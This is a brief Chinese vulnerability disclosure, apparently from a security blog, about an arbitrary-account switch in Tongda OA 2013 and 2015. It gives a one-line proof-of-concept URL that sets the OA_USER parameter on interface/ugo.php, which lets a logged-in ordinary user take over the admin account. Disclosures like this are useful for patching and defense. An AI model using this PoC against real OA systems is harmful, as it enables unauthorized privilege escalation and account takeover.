## 通达oa 任意账号跳转
### 漏洞描述
需要登录
### 漏洞影响
2013、2015版本
### 漏洞复现
POC:
`http://url/interface/ugo.php?OA_USER=admin`
通过控制OA_USER参数进行任意⽤户的跳转,⽐如说你现在是个普通权限的⽤户,使用这个⻚面即可跳转到admin用户下面。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
相关推荐
作者
最近一周热门文章
1致远OA checkComponentFile后台反序列化任意命令执行
2025年12月17日3金和OA AjaxForDepartmentCollect.ashx SQL注入
2025年12月20日4安友固定资产管理系统 DoUpload 存在任意文件上传
2025年12月18日5友加畅捷管理系统 RepFile.ashx 存在文件上传致RCE
2025年12月18日6用友NC pkevalset SQL注入
2025年12月19日标签云
请登录后查看评论内容